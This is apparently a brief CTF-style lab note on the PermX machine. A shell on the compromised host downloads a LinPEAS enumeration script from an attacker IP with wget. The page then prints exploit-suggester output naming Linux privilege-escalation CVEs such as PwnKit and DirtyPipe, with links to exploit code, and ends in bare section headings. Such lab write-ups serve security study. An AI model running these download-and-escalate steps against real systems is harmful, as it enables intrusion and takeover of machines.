InfoSec LAB

PermX_Automated

Created: 1 min read

PEAS

www-data@permx:/dev/shm$ wget http://10.10.14.143/linpeas_CVE_check.sh
 
--2024-07-08 14:59:04--  http://10.10.14.143/linpeas_CVE_check.sh
Connecting to 10.10.14.143:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [text/x-sh]
Saving to: ‘linpeas_CVE_check.sh’
 
linpeas_CVE_check.sh 100%[===================>] 808.76K  2.11MB/s    in 0.4s    
 
2024-07-08 14:59:04 (2.11 MB/s) - ‘linpeas_CVE_check.sh’ saved [828172/828172]
 
www-data@permx:/dev/shm$ chmod 755 linpeas_CVE_check.sh

Delivery Complete

Executing PEAS

CVEs

╔══════════╣ Executing Linux Exploit Suggester
m/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
1-22555/exploit.chttps://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-202
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

Services

DNS

Active Ports

mysql instance

MySQL

Apache

SSH

False-positive?

/opt

/opt/acl.sh

Interactive Graph View

Backlinks